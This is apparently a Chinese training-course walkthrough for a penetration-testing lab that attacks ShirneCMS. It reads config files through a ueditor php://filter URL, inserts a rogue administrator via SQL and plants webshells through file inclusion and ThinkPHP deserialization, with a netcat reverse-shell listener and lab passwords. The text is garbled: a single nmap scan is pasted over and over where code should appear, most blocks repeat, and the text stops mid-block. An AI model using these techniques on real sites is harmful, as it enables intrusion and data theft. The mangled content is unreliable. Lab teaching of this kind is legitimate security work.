暗月渗透测试培训

暗月渗透渗透测试，是一套很好的安全培训体系。

多年实战渗透经验，从基础到深入 40个课程大纲。

十多个项目实战训练学习。暗月培训数千人，在业界得到一致好评

暑假活动最后一天

课程介绍

原价：2600

活动价：2400

活动时间：2023.07.14-2023.07.18

抓紧时间上车了

课程仅供参考学习研究使用，

请勿用于违法用途。

扫描二维码添加微信咨询学习

1.靶场介绍

该靶场模式红队在授权的情况下对蓝队外网和内网一次安全评估测试。

技能学习

外网渗透 php代码审计 java代码审计常见的渗透工具使用

内网渗透内网漫游内网横向内网穿透的域渗透 linux提权等

1.1 靶场账号和密码

靶场共有五台机子以下是一些配置信息

主机名	ip	账号和密码
web	192.168.10.175	web web233
web123	192.168.10.174	web web123web
pc1	192.168.10.172 10.10.10.138	pc1 sunday233
ad2012	10.10.10.133	域控密码 administrator Qqsdxxx.123 域控普通用户ubuntu iLove123
exchange	10.10.10.137	本地管理员administrator QWEzzz.123

web主机的redis 密码 abc123

web123主机的mysql账号和密码 root vVICDU1Erw

index.php/admin/login/index.html 后台账号和密码 admin 1lovehackers

1.2 靶场搭建

桥接网段 192.168.10.0/24

主机网段 VMnet19 10.10.10.0/24

修改web主机中的frpc.ini 之后连接外网的frps即可

web@web:~/frp$ cat frpc.ini
[common]
server_addr = 103.73.162.40
server_port = 7777
token = moonsec..123

[web123]
type = tcp
local_ip = 192.168.10.175
local_port = 8080
remote_port = 8080

#[redis]
#type = tcp
#local_ip = 192.168.10.175
#local_port = 6379
#remote_port = 6379

[web]
type = tcp
local_ip = 192.168.10.174
local_port =  80
remote_port = 80
web@web:~/frp$ cat frpc.ini
[common]
server_addr = 103.73.162.40
server_port = 7777
token = moonsec..123

[web123]
type = tcp
local_ip = 192.168.10.175
local_port = 8080
remote_port = 8080

#[redis]
#type = tcp
#local_ip = 192.168.10.175
#local_port = 6379
#remote_port = 6379

[web]
type = tcp
local_ip = 192.168.10.174
local_port =  80
remote_port = 80

访问你的外网ip即可搭建成功

8080端口

1.3 靶场拓扑图

2.渗透测试过程

2.1 信息收集

nmap对指定IP的端口进行探测

nmap -sV -A 103.73.162.40 -oN port.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-03 13:16 EDT
Nmap scan report for 103.73.162.40
Host is up (0.080s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT     STATE    SERVICE        VERSION
22/tcp   open     ssh            OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 aa:46:7a:1c:6c:f1:41:f7:89:dc:9b:a0:10:f3:2c:f3 (RSA)
|   256 45:00:37:b8:5e:2e:01:ed:bd:7d:ef:07:80:75:d8:81 (ECDSA)
|_  256 42:1f:31:5e:cb:e5:fe:56:05:99:28:c7:78:25:6e:80 (ED25519)
80/tcp   open     http           Apache httpd 2.4.18 ((Ubuntu))
|_http-title: ShirneCMS
|_http-server-header: Apache/2.4.18 (Ubuntu)
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
445/tcp  filtered microsoft-ds
593/tcp  filtered http-rpc-epmap
1434/tcp filtered ms-sql-m
4444/tcp filtered krb524
7777/tcp open     cbt?
8080/tcp open     http-proxy
nmap -sV -A 103.73.162.40 -oN port.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-03 13:16 EDT
Nmap scan report for 103.73.162.40
Host is up (0.080s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT     STATE    SERVICE        VERSION
22/tcp   open     ssh            OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 aa:46:7a:1c:6c:f1:41:f7:89:dc:9b:a0:10:f3:2c:f3 (RSA)
|   256 45:00:37:b8:5e:2e:01:ed:bd:7d:ef:07:80:75:d8:81 (ECDSA)
|_  256 42:1f:31:5e:cb:e5:fe:56:05:99:28:c7:78:25:6e:80 (ED25519)
80/tcp   open     http           Apache httpd 2.4.18 ((Ubuntu))
|_http-title: ShirneCMS
|_http-server-header: Apache/2.4.18 (Ubuntu)
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
445/tcp  filtered microsoft-ds
593/tcp  filtered http-rpc-epmap
1434/tcp filtered ms-sql-m
4444/tcp filtered krb524
7777/tcp open     cbt?
8080/tcp open     http-proxy

发现 80端口是 ShirneCMS

8080端口是 shiro-redis tutorial 默认账号和密码 admin 123456

2.2 外网打点

通过搜索引擎找到cve漏洞连接 https://www.cvedetails.com/cve/CVE-2022-37299

2.3 ueditor任意文件读取漏洞

漏洞细节

https://gitee.com/shirnecn/ShirneCMS/issues/I5JRHJ?from=project-issue

漏洞的原理是在ueditor编辑器中 file_get_contents没有传入的参数进行过滤导致可以使用伪协议读取文件

读取数据库配置文件

http://103.73.162.40/static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=../../../../config/database.php&maxwidth=-1&referer=testhttp://103.73.162.40/static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=../../../../config/database.php&maxwidth=-1&referer=test

base64转码

return [
    'type'            => 'mysql',
    'hostname'        => 'localhost',
    'database'        => 'cms',
    'username'        => 'root',
    'password'        => 'vVICDU1Erw',
    'hostport'        => '',return [
    'type'            => 'mysql',
    'hostname'        => 'localhost',
    'database'        => 'cms',
    'username'        => 'root',
    'password'        => 'vVICDU1Erw',
    'hostport'        => '',

2.4 phpmyadmin读取文件转换字符

使用phpmyadmin需要显示内容记得勾上完全内容

选项勾上完整内容

/etc/passwd 内容

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
web:x:1000:1000:web,,,:/home/web:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologinroot:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
web:x:1000:1000:web,,,:/home/web:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin

通过网站报错得到服务器相关信息

SERVER_SIGNATURE<address>Apache/2.4.18 (Ubuntu) Server at 103.73.162.40 Port 80</address>
SERVER_SOFTWAREApache/2.4.18 (Ubuntu)
SERVER_NAME103.73.162.40
SERVER_ADDR192.168.10.174
SERVER_PORT80
REMOTE_ADDR192.168.10.174
DOCUMENT_ROOT/var/www/html/public
REQUEST_SCHEMEhttp
CONTEXT_PREFIX
CONTEXT_DOCUMENT_ROOT/var/www/html/public
SERVER_ADMINwebmaster@localhost
SCRIPT_FILENAME/var/www/html/public/index.phpSERVER_SIGNATURE<address>Apache/2.4.18 (Ubuntu) Server at 103.73.162.40 Port 80</address>
SERVER_SOFTWAREApache/2.4.18 (Ubuntu)
SERVER_NAME103.73.162.40
SERVER_ADDR192.168.10.174
SERVER_PORT80
REMOTE_ADDR192.168.10.174
DOCUMENT_ROOT/var/www/html/public
REQUEST_SCHEMEhttp
CONTEXT_PREFIX
CONTEXT_DOCUMENT_ROOT/var/www/html/public
SERVER_ADMINwebmaster@localhost
SCRIPT_FILENAME/var/www/html/public/index.php

通过into outfile 写入网站失败应该是mysql权限并没有网站的写入权限

select 'xx' into outfile '/var/www/html/public/uploads/xx.txt'select 'xx' into outfile '/var/www/html/public/uploads/xx.txt'

2.5 添加管理员登录

后台密码无法破解添加一个管理员账号

以下是程序登录密码加密得代码

function encode_password($pass, $salt = '')
{
    return md5(md5($pass) . $salt);
}function encode_password($pass, $salt = '')
{
    return md5(md5($pass) . $salt);
}

执行SQL语句添加账号信息

INSERT INTO `sa_manager` (`id`, `pid`, `username`, `realname`, `mobile`, `email`, `password`, `salt`, `avatar`, `create_time`, `update_time`, `login_ip`, `status`, `type`, `logintime`, `last_view_member`) VALUES
(null, 0, 'moonsec', '', '', '[email protected]', 'daab703d066e8bf31c5da95e3bb853a9', '123', NULL, 1436679338, 1682967322, '192.168.10.179', 1, 1, 1682967240, 1682616300);
INSERT INTO `sa_manager` (`id`, `pid`, `username`, `realname`, `mobile`, `email`, `password`, `salt`, `avatar`, `create_time`, `update_time`, `login_ip`, `status`, `type`, `logintime`, `last_view_member`) VALUES
(null, 0, 'moonsec', '', '', '[email protected]', 'daab703d066e8bf31c5da95e3bb853a9', '123', NULL, 1436679338, 1682967322, '192.168.10.179', 1, 1, 1682967240, 1682616300);

后台登录成功

2.6 thinkphp5 文件包含拿webshell

搜索全文

$this->fetch($$this->fetch($

发现有几个可控点。选择其中一个 application/index/controller/ArticleController.php

nmap -sV -A 103.73.162.40 -oN port.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-03 13:16 EDT
Nmap scan report for 103.73.162.40
Host is up (0.080s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT     STATE    SERVICE        VERSION
22/tcp   open     ssh            OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 aa:46:7a:1c:6c:f1:41:f7:89:dc:9b:a0:10:f3:2c:f3 (RSA)
|   256 45:00:37:b8:5e:2e:01:ed:bd:7d:ef:07:80:75:d8:81 (ECDSA)
|_  256 42:1f:31:5e:cb:e5:fe:56:05:99:28:c7:78:25:6e:80 (ED25519)
80/tcp   open     http           Apache httpd 2.4.18 ((Ubuntu))
|_http-title: ShirneCMS
|_http-server-header: Apache/2.4.18 (Ubuntu)
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
445/tcp  filtered microsoft-ds
593/tcp  filtered http-rpc-epmap
1434/tcp filtered ms-sql-m
4444/tcp filtered krb524
7777/tcp open     cbt?
8080/tcp open     http-proxy
nmap -sV -A 103.73.162.40 -oN port.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-03 13:16 EDT
Nmap scan report for 103.73.162.40
Host is up (0.080s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT     STATE    SERVICE        VERSION
22/tcp   open     ssh            OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 aa:46:7a:1c:6c:f1:41:f7:89:dc:9b:a0:10:f3:2c:f3 (RSA)
|   256 45:00:37:b8:5e:2e:01:ed:bd:7d:ef:07:80:75:d8:81 (ECDSA)
|_  256 42:1f:31:5e:cb:e5:fe:56:05:99:28:c7:78:25:6e:80 (ED25519)
80/tcp   open     http           Apache httpd 2.4.18 ((Ubuntu))
|_http-title: ShirneCMS
|_http-server-header: Apache/2.4.18 (Ubuntu)
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
445/tcp  filtered microsoft-ds
593/tcp  filtered http-rpc-epmap
1434/tcp filtered ms-sql-m
4444/tcp filtered krb524
7777/tcp open     cbt?
8080/tcp open     http-proxy
0

首先使用 phpmyadmin 写入文件到/tmp目录下

nmap -sV -A 103.73.162.40 -oN port.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-03 13:16 EDT
Nmap scan report for 103.73.162.40
Host is up (0.080s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT     STATE    SERVICE        VERSION
22/tcp   open     ssh            OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 aa:46:7a:1c:6c:f1:41:f7:89:dc:9b:a0:10:f3:2c:f3 (RSA)
|   256 45:00:37:b8:5e:2e:01:ed:bd:7d:ef:07:80:75:d8:81 (ECDSA)
|_  256 42:1f:31:5e:cb:e5:fe:56:05:99:28:c7:78:25:6e:80 (ED25519)
80/tcp   open     http           Apache httpd 2.4.18 ((Ubuntu))
|_http-title: ShirneCMS
|_http-server-header: Apache/2.4.18 (Ubuntu)
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
445/tcp  filtered microsoft-ds
593/tcp  filtered http-rpc-epmap
1434/tcp filtered ms-sql-m
4444/tcp filtered krb524
7777/tcp open     cbt?
8080/tcp open     http-proxy
nmap -sV -A 103.73.162.40 -oN port.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-03 13:16 EDT
Nmap scan report for 103.73.162.40
Host is up (0.080s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT     STATE    SERVICE        VERSION
22/tcp   open     ssh            OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 aa:46:7a:1c:6c:f1:41:f7:89:dc:9b:a0:10:f3:2c:f3 (RSA)
|   256 45:00:37:b8:5e:2e:01:ed:bd:7d:ef:07:80:75:d8:81 (ECDSA)
|_  256 42:1f:31:5e:cb:e5:fe:56:05:99:28:c7:78:25:6e:80 (ED25519)
80/tcp   open     http           Apache httpd 2.4.18 ((Ubuntu))
|_http-title: ShirneCMS
|_http-server-header: Apache/2.4.18 (Ubuntu)
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
445/tcp  filtered microsoft-ds
593/tcp  filtered http-rpc-epmap
1434/tcp filtered ms-sql-m
4444/tcp filtered krb524
7777/tcp open     cbt?
8080/tcp open     http-proxy
1

添加分类在别名 ../../../../../../tmp

再添加文章访问即可获取权限

监听端口 nc -lvnp 2333

接着上蚁剑关闭反弹shell 不然网站一直卡着不动

nmap -sV -A 103.73.162.40 -oN port.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-03 13:16 EDT
Nmap scan report for 103.73.162.40
Host is up (0.080s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT     STATE    SERVICE        VERSION
22/tcp   open     ssh            OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 aa:46:7a:1c:6c:f1:41:f7:89:dc:9b:a0:10:f3:2c:f3 (RSA)
|   256 45:00:37:b8:5e:2e:01:ed:bd:7d:ef:07:80:75:d8:81 (ECDSA)
|_  256 42:1f:31:5e:cb:e5:fe:56:05:99:28:c7:78:25:6e:80 (ED25519)
80/tcp   open     http           Apache httpd 2.4.18 ((Ubuntu))
|_http-title: ShirneCMS
|_http-server-header: Apache/2.4.18 (Ubuntu)
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
445/tcp  filtered microsoft-ds
593/tcp  filtered http-rpc-epmap
1434/tcp filtered ms-sql-m
4444/tcp filtered krb524
7777/tcp open     cbt?
8080/tcp open     http-proxy
nmap -sV -A 103.73.162.40 -oN port.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-03 13:16 EDT
Nmap scan report for 103.73.162.40
Host is up (0.080s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT     STATE    SERVICE        VERSION
22/tcp   open     ssh            OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 aa:46:7a:1c:6c:f1:41:f7:89:dc:9b:a0:10:f3:2c:f3 (RSA)
|   256 45:00:37:b8:5e:2e:01:ed:bd:7d:ef:07:80:75:d8:81 (ECDSA)
|_  256 42:1f:31:5e:cb:e5:fe:56:05:99:28:c7:78:25:6e:80 (ED25519)
80/tcp   open     http           Apache httpd 2.4.18 ((Ubuntu))
|_http-title: ShirneCMS
|_http-server-header: Apache/2.4.18 (Ubuntu)
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
445/tcp  filtered microsoft-ds
593/tcp  filtered http-rpc-epmap
1434/tcp filtered ms-sql-m
4444/tcp filtered krb524
7777/tcp open     cbt?
8080/tcp open     http-proxy
2

这样就获取一个python shell权限

2.7 thinkphp5 反序列化拿webshell

application/common/model/SettingModel.php

nmap -sV -A 103.73.162.40 -oN port.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-03 13:16 EDT
Nmap scan report for 103.73.162.40
Host is up (0.080s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT     STATE    SERVICE        VERSION
22/tcp   open     ssh            OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 aa:46:7a:1c:6c:f1:41:f7:89:dc:9b:a0:10:f3:2c:f3 (RSA)
|   256 45:00:37:b8:5e:2e:01:ed:bd:7d:ef:07:80:75:d8:81 (ECDSA)
|_  256 42:1f:31:5e:cb:e5:fe:56:05:99:28:c7:78:25:6e:80 (ED25519)
80/tcp   open     http           Apache httpd 2.4.18 ((Ubuntu))
|_http-title: ShirneCMS
|_http-server-header: Apache/2.4.18 (Ubuntu)
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
445/tcp  filtered microsoft-ds
593/tcp  filtered http-rpc-epmap
1434/tcp filtered ms-sql-m
4444/tcp filtered krb524
7777/tcp open     cbt?
8080/tcp open     http-proxy
nmap -sV -A 103.73.162.40 -oN port.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-03 13:16 EDT
Nmap scan report for 103.73.162.40
Host is up (0.080s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT     STATE    SERVICE        VERSION
22/tcp   open     ssh            OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 aa:46:7a:1c:6c:f1:41:f7:89:dc:9b:a0:10:f3:2c:f3 (RSA)
|   256 45:00:37:b8:5e:2e:01:ed:bd:7d:ef:07:80:75:d8:81 (ECDSA)
|_  256 42:1f:31:5e:cb:e5:fe:56:05:99:28:c7:78:25:6e:80 (ED25519)
80/tcp   open     http           Apache httpd 2.4.18 ((Ubuntu))
|_http-title: ShirneCMS
|_http-server-header: Apache/2.4.18 (Ubuntu)
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
445/tcp  filtered microsoft-ds
593/tcp  filtered http-rpc-epmap
1434/tcp filtered ms-sql-m
4444/tcp filtered krb524
7777/tcp open     cbt?
8080/tcp open     http-proxy
3

在 SettingModel 存在函数 unserialize 因为这个套程序是使用thinkphp5.1开发所以可以使用tp5利用链执行命令

thinkphp5.1 利用链

nmap -sV -A 103.73.162.40 -oN port.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-03 13:16 EDT
Nmap scan report for 103.73.162.40
Host is up (0.080s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT     STATE    SERVICE        VERSION
22/tcp   open     ssh            OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 aa:46:7a:1c:6c:f1:41:f7:89:dc:9b:a0:10:f3:2c:f3 (RSA)
|   256 45:00:37:b8:5e:2e:01:ed:bd:7d:ef:07:80:75:d8:81 (ECDSA)
|_  256 42:1f:31:5e:cb:e5:fe:56:05:99:28:c7:78:25:6e:80 (ED25519)
80/tcp   open     http           Apache httpd 2.4.18 ((Ubuntu))
|_http-title: ShirneCMS
|_http-server-header: Apache/2.4.18 (Ubuntu)
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
445/tcp  filtered microsoft-ds
593/tcp  filtered http-rpc-epmap
1434/tcp filtered ms-sql-m
4444/tcp filtered krb524
7777/tcp open     cbt?
8080/tcp open     http-proxy
nmap -sV -A 103.73.162.40 -oN port.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-03 13:16 EDT
Nmap scan report for 103.73.162.40
Host is up (0.080s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT     STATE    SERVICE        VERSION
22/tcp   open     ssh            OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 aa:46:7a:1c:6c:f1:41:f7:89:dc:9b:a0:10:f3:2c:f3 (RSA)
|   256 45:00:37:b8:5e:2e:01:ed:bd:7d:ef:07:80:75:d8:81 (ECDSA)
|_  256 42:1f:31:5e:cb:e5:fe:56:05:99:28:c7:78:25:6e:80 (ED25519)
80/tcp   open     http           Apache httpd 2.4.18 ((Ubuntu))
|_http-title: ShirneCMS
|_http-server-header: Apache/2.4.18 (Ubuntu)
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
445/tcp  filtered microsoft-ds
593/tcp  filtered http-rpc-epmap
1434/tcp filtered ms-sql-m
4444/tcp filtered krb524
7777/tcp open     cbt?
8080/tcp open     http-proxy
4

生成的payload

nmap -sV -A 103.73.162.40 -oN port.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-03 13:16 EDT
Nmap scan report for 103.73.162.40
Host is up (0.080s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT     STATE    SERVICE        VERSION
22/tcp   open     ssh            OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 aa:46:7a:1c:6c:f1:41:f7:89:dc:9b:a0:10:f3:2c:f3 (RSA)
|   256 45:00:37:b8:5e:2e:01:ed:bd:7d:ef:07:80:75:d8:81 (ECDSA)
|_  256 42:1f:31:5e:cb:e5:fe:56:05:99:28:c7:78:25:6e:80 (ED25519)
80/tcp   open     http           Apache httpd 2.4.18 ((Ubuntu))
|_http-title: ShirneCMS
|_http-server-header: Apache/2.4.18 (Ubuntu)
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
445/tcp  filtered microsoft-ds
593/tcp  filtered http-rpc-epmap
1434/tcp filtered ms-sql-m
4444/tcp filtered krb524
7777/tcp open     cbt?
8080/tcp open     http-proxy
nmap -sV -A 103.73.162.40 -oN port.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-03 13:16 EDT
Nmap scan report for 103.73.162.40
Host is up (0.080s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT     STATE    SERVICE        VERSION
22/tcp   open     ssh            OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 aa:46:7a:1c:6c:f1:41:f7:89:dc:9b:a0:10:f3:2c:f3 (RSA)
|   256 45:00:37:b8:5e:2e:01:ed:bd:7d:ef:07:80:75:d8:81 (ECDSA)
|_  256 42:1f:31:5e:cb:e5:fe:56:05:99:28:c7:78:25:6e:80 (ED25519)
80/tcp   open     http           Apache httpd 2.4.18 ((Ubuntu))
|_http-title: ShirneCMS
|_http-server-header: Apache/2.4.18 (Ubuntu)
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
445/tcp  filtered microsoft-ds
593/tcp  filtered http-rpc-epmap
1434/tcp filtered ms-sql-m
4444/tcp filtered krb524
7777/tcp open     cbt?
8080/tcp open     http-proxy
5

在后台系统修改配置文件随便选择一个选择多选

提交抓包在字段值修改成payload 记得把url编码解码再提交。

成功后会在网站目录生成moonsec.php 密码是 moon

2.9 重装漏洞写webshell

在 application/admin/common.php 存在unlink函数任意任意删除漏洞

nmap -sV -A 103.73.162.40 -oN port.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-03 13:16 EDT
Nmap scan report for 103.73.162.40
Host is up (0.080s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT     STATE    SERVICE        VERSION
22/tcp   open     ssh            OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 aa:46:7a:1c:6c:f1:41:f7:89:dc:9b:a0:10:f3:2c:f3 (RSA)
|   256 45:00:37:b8:5e:2e:01:ed:bd:7d:ef:07:80:75:d8:81 (ECDSA)
|_  256 42:1f:31:5e:cb:e5:fe:56:05:99:28:c7:78:25:6e:80 (ED25519)
80/tcp   open     http           Apache httpd 2.4.18 ((Ubuntu))
|_http-title: ShirneCMS
|_http-server-header: Apache/2.4.18 (Ubuntu)
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
445/tcp  filtered microsoft-ds
593/tcp  filtered http-rpc-epmap
1434/tcp filtered ms-sql-m
4444/tcp filtered krb524
7777/tcp open     cbt?
8080/tcp open     http-proxy
nmap -sV -A 103.73.162.40 -oN port.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-03 13:16 EDT
Nmap scan report for 103.73.162.40
Host is up (0.080s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT     STATE    SERVICE        VERSION
22/tcp   open     ssh            OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 aa:46:7a:1c:6c:f1:41:f7:89:dc:9b:a0:10:f3:2c:f3 (RSA)
|   256 45:00:37:b8:5e:2e:01:ed:bd:7d:ef:07:80:75:d8:81 (ECDSA)
|_  256 42:1f:31:5e:cb:e5:fe:56:05:99:28:c7:78:25:6e:80 (ED25519)
